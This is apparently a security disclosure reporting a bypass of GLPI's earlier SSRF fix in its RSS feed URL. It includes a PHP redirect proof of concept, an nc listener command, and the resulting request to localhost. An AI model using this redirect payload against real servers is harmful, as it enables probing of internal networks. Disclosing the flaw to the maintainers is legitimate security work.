Description

By looking at this URL : https://github.com/glpi-project/glpi/security/advisories/GHSA-rqgx-gqhp-x8vv, I understand that a SSRF was possible in the URL of the RSS feed, and in fact, this has been fix.

Howerver, I found a bypass to CVE-2022-36112.

Proof of Concept

To trigger the bug, setup a PHP server on a remote machine, and a file index.php containing this code :

<?php
header("Location: http://localhost:4444");
?>

Then, on the server where glpi is running, put a listener on the port 4444.

On the RSS feed, put the URL "http://<your server>/index.php", and then hit enter.

You will see that, on port 4444, we receive this request :

user@vm:/var/www/glpi$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on 127.0.0.1 59222
GET / HTTP/1.1
Host: localhost:4444
User-Agent: SimplePie/1.5.8 (Feed Parser; http://simplepie.org; Allow like Gecko) Build/20211224025350
Accept-Encoding: deflate, gzip, br
Referer: http://localhost:4444/
Accept: application/atom+xml, application/rss+xml, application/rdf+xml;q=0.9, application/xml;q=0.8, text/xml;q=0.8, text/html;q=0.7, unknown/unknown;q=0.1, application/unknown;q=0.1, */*;q=0.1

Impact

This vulnerability can be used by remote attacker to discover the internal network of the machine running glpi.